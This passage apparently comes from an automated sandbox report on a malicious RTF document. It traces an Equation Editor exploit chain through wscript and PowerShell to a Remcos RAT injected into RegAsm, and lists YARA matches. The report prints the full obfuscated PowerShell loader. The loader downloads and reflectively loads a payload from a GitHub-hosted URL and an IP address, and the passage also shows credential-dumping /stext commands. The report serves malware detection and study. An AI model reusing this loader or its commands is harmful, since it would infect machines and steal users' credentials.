              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043610D11_2_0043610D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044731011_2_00447310
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044A49011_2_0044A490
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040755A11_2_0040755A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043C56011_2_0043C560
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044B61011_2_0044B610
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044D6C011_2_0044D6C0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004476F011_2_004476F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044B87011_2_0044B870
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044081D11_2_0044081D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041495711_2_00414957
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004079EE11_2_004079EE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407AEB11_2_00407AEB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044AA8011_2_0044AA80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00412AA911_2_00412AA9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404B7411_2_00404B74
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404B0311_2_00404B03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044BBD811_2_0044BBD8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404BE511_2_00404BE5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404C7611_2_00404C76
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00415CFE11_2_00415CFE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00416D7211_2_00416D72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00446D3011_2_00446D30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00446D8B11_2_00446D8B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00406E8F11_2_00406E8F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040503812_2_00405038
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041208C12_2_0041208C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004050A912_2_004050A9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040511A12_2_0040511A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043C13A12_2_0043C13A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004051AB12_2_004051AB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044930012_2_00449300
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040D32212_2_0040D322
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044A4F012_2_0044A4F0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043A5AB12_2_0043A5AB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041363112_2_00413631
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044669012_2_00446690
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044A73012_2_0044A730
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004398D812_2_004398D8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004498E012_2_004498E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0044A88612_2_0044A886
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0043DA0912_2_0043DA09
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00438D5E12_2_00438D5E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00449ED012_2_00449ED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041FE8312_2_0041FE83
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00430F5412_2_00430F54
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004050C213_2_004050C2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004014AB13_2_004014AB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040513313_2_00405133
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004051A413_2_004051A4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040124613_2_00401246
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040CA4613_2_0040CA46
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040523513_2_00405235
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004032C813_2_004032C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040168913_2_00401689
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00402F6013_2_00402F60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E10 appears 54 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 49 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434770 appears 41 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
              Source: MKWbWHd5Ni.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
              Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.powershell.exe.3b90b60.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.powershell.exe.3b90b60.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 8.2.powershell.exe.3b90b60.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 8.2.powershell.exe.3b90b60.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 8.2.powershell.exe.3b90b60.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000008.00000002.381523200.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 3488, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3596, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: powershell.exe PID: 3596, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: RegAsm.exe PID: 3728, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: bhvD26D.tmp.11.drBinary or memory string: org.slneighbors
              Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winRTF@17/18@4/4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,11_2_004182CE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,9_2_00417952
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,13_2_00410DE1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,11_2_00418758
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,9_2_0040F474
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,9_2_0041B4A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AA4A
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$WbWHd5Ni.rtfJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-43JG4A
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7E05.tmpJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.399836346.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: RegAsm.exe, 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.392388045.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: MKWbWHd5Ni.rtfReversingLabs: Detection: 52%
              Source: MKWbWHd5Ni.rtfVirustotal: Detection: 61%
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
              Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS"
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJFZlUmJvc2VQUkVmRVJFTmNFLlRvU3RSaW5HKClbMSwzXSsneCctSm9pbicnKSggKCdnJysnMjgnKyd1cmwnKycgPScrJyBzZzFodHQnKydwJysnczovL3Jhdy4nKydnaScrJ3RodWJ1JysncycrJ2VyYycrJ28nKyduJysndGUnKydudC5jb20nKycvTicrJ28nKydEZScrJ3RlYycrJ3RPbicrJy9Ob0QnKydlJysndGVjdE9uL3JlZnMvaGUnKydhZHMvbWFpbi8nKydEZXQnKydhaCcrJ05vJysndGgtJysnVi50eHRzZzE7JysnIGcyJysnOCcrJ2InKydhc2U2JysnNENvbnQnKydlJysnbicrJ3QgPScrJyAnKycoTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTicrJ2UnKyd0LldlJysnYicrJ0NsaWVuJysndCcrJykuJysnRCcrJ293bmxvJysnYScrJ2RTJysndHJpbicrJ2coZzI4dXJsKTsgJysnZzInKyc4YmluYScrJ3J5Q29udCcrJ2UnKyduJysndCA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb20nKydCJysnYXNlJysnNjQnKydTdCcrJ3JpbmcoZzInKyc4YmFzZTY0JysnQ28nKyduJysndGUnKydudCknKyc7ICcrJ2cyOCcrJ2FzJysnc2VtYmx5ICcrJz0nKycgWycrJ1JlZicrJ2xlJysnYycrJ3QnKydpb24nKycuQScrJ3NzZW1ibHknKyddOjpMb2FkJysnKGcyOGJpbmFyJysneUNvJysnbnQnKydlbnQpOyBbZG5saWIuSU8uSCcrJ28nKydtZV06OlYnKydBSScrJyhoJysnRGonKyd0eHQuRkZSJysnUkVXLycrJzAnKyc1Ni8zJysnMTEnKycuMScrJzUyLjMnKyc4JysnLjE1Ly86JysncCcrJ3R0JysnaGhEJysnaiwgaCcrJ0QnKydqJysnZGUnKydzYXRpdicrJ2FkJysnb2hEaicrJywgaEQnKydqZCcrJ2VzYXQnKydpJysndmFkJysnb2hEaiwgaERqZCcrJ2UnKydzJysnYXQnKydpdmFkJysnb2hEaiwnKycgJysnaERqUicrJ2VnQXNtaEQnKydqJysnLCBoRGpoRGosJysnaCcrJ0QnKydqaERqJysnKScpLlJlcExhQ0UoJ2hEaicsW1N0UklOZ11bQ0hBcl0zNCkuUmVwTGFDRSgnZzI4JywnJCcpLlJlcExhQ0UoJ3NnMScsW1N0UklOZ11bQ0hBcl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRbosePREfERENcE.ToStRinG()[1,3]+'x'-Join'')( ('g'+'28'+'url'+' ='+' sg1htt'+'p'+'s://raw.'+'gi'+'thubu'+'s'+'erc'+'o'+'n'+'te'+'nt.com'+'/N'+'o'+'De'+'tec'+'tOn'+'/NoD'+'e'+'tectOn/refs/he'+'ads/main/'+'Det'+'ah'+'No'+'th-'+'V.txtsg1;'+' g2'+'8'+'b'+'ase6'+'4Cont'+'e'+'n'+'t ='+' '+'(New-Obj'+'ect System.N'+'e'+'t.We'+'b'+'Clien'+'t'+').'+'D'+'ownlo'+'a'+'dS'+'trin'+'g(g28url); '+'g2'+'8bina'+'ryCont'+'e'+'n'+'t = [System.'+'Convert]::From'+'B'+'ase'+'64'+'St'+'ring(g2'+'8base64'+'Co'+'n'+'te'+'nt)'+'; '+'g28'+'as'+'sembly '+'='+' ['+'Ref'+'le'+'c'+'t'+'ion'+'.A'+'ssembly'+']::Load'+'(g28binar'+'yCo'+'nt'+'ent); [dnlib.IO.H'+'o'+'me]::V'+'AI'+'(h'+'Dj'+'txt.FFR'+'REW/'+'0'+'56/3'+'11'+'.1'+'52.3'+'8'+'.15//:'+'p'+'tt'+'hhD'+'j, h'+'D'+'j'+'de'+'sativ'+'ad'+'ohDj'+', hD'+'jd'+'esat'+'i'+'vad'+'ohDj, hDjd'+'e'+'s'+'at'+'ivad'+'ohDj,'+' '+'hDjR'+'egAsmhD'+'j'+', hDjhDj,'+'h'+'D'+'jhDj'+')').RepLaCE('hDj',[StRINg][CHAr]34).RepLaCE('g28','$').RepLaCE('sg1',[StRINg][CHAr]39))"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ptdercjwijh"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rvipsuupwrzfhg"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cpnhtnerszrskmtpxa"
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgetmebackgreatdayfo.vBS" Jump to behavior
